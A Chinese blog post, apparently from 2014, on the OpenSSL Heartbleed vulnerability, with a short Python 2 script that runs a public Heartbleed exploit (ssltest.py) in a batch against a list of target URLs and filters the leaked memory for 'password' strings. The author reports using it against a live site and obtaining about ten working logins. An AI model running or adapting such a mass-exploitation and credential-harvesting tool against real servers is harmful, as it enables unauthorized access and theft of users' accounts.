python显示血量条_批量检测openssl(心脏出血)漏洞(新手学python)

最近openssl(心脏滴血)漏洞挺火的,貌似这几天看到微博上有人说没多少危害之类的,不过根据亲测,发现危害还是比较大的。

所以找了个站,用for循环,批量抓了100个文件,大概10分钟左右完成,查找帐号和密码大概有10个左右,测试基本都是可以登录的,如果是访问量大的网站,可能段时间内能抓到更多!自己利用现有EXP写了个方便批量检测该漏洞的,主要是练手python,感觉不练进步太慢。贴上代码:

#coding:utf-8

import subprocess

import time

#遍历目标文件中的URL

def readtar(targetpath):

f=open(targetpath,"r")

for url in f.readlines():

url=url.strip("\r\n")

exploit(url)

#Exp执行,获取执行后的原始回显,发送给getres进行处理

def exploit(url):

cmd="python "+r"e:\0day\openssl\ssltest.py "+url

print cmd

expover=subprocess.Popen(cmd,stdout=subprocess.PIPE)

time.sleep(5)

expres=expover.stdout.read()

print expres

'''

#EXP执行回显筛选,获取有password的字符串

def getres(expres):

ispwd=False

if expres.find("password")>0:

ispwd=True

if ispwd==True:

keywords="password"

before=expres[expres.index(keywords)-280:expres.index(keywords)]

after=expres[expres.index(keywords)+len(keywords):expres.index(keywords)+len(keywords)+140]

passallstr=before+keywords+after

print passallstr

if len(passallstr)==0:

print "Maybe no pass or user in strings"

'''

if __name__=='__main__':

#注明测试目标所在文件

targetfile=r"e:\0day\url.txt"

readtar(targetfile)

主要还是借助公布的exp,只是增加了很简单的文件读取遍历挨个测试的代码,还想只打印出出现”password”关键字的前后几行,最后貌似还有点问题,所以注释掉了。

最后编辑:2014-04-13作者:admin

这个作者貌似有点懒,什么都没有留下。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值